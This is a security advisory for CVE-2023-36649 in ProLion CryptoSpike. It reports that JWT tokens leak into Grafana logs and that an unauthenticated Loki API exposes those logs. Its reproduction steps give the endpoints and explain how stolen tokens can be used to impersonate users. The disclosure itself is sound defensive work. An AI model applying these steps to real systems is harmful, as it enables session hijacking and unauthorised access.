Headline
CVE-2023-36649: CVCN
Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Granafa authenticated user) or from the Loki REST API without authentication.
Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Granafa authenticated user) or from the Loki REST API without authentication.
Introduction
CryptoSpike centrally collects all its logs inside Grafana system, installed as a container in the infrastructure. Inside these logs, sensitive information can be found, e.g, the JWT Bearer Tokens of users connecting to the CryptoSpike web management interface. A malicious user having only access to Grafana system, could leverage the information collected in the logs to access CryptoSpike. In particular, the malicious user could capture the various JWT tokens and manually insert them inside the browser cookies of an anonymous session on the CryptoSpike web management interface, thus accessing to it by impersonating other users without their knowledge.
Moreover, the web interface of Grafana is correctly exposed in https, but also available under http. Finally, among the services exposed on the host network, Loki REST API are also exposed. These APIs are available to non-authenticated users, and they allow access to all logs collected from Grafana, completely bypassing all authentication mechanisms of Grafana.
Steps to reproduce
Login in Grafana and access to the "General", "Browse", “Logs” section. Choose among “Service Name” items the log type called “core_services_api_gateway” of the “localhost” Host. Wait some seconds while other users navigate the web management, and the JWT tokens will appear as an entry "Bearer [JWT TOKEN]":
To check that Grafana interface is exposed correctly in https besides the reverse proxy, but also incorrectly in http in clear text:
- HTTP port 9000: http://LEADER_IP:9000/ (no redirect is performed neither in https neither to another port)
- HTTPS port 443: https://LEADER_IP/monitoring
Finally, since the Loki REST APIs are exposed on the host network, a non-authenticated user can invoke a particular endpoint (http://LEADER_IP:3100/loki/api/v1/query) used to perform searches among all the logs collected by Grafana, completely bypassing Grafana authentication mechanisms.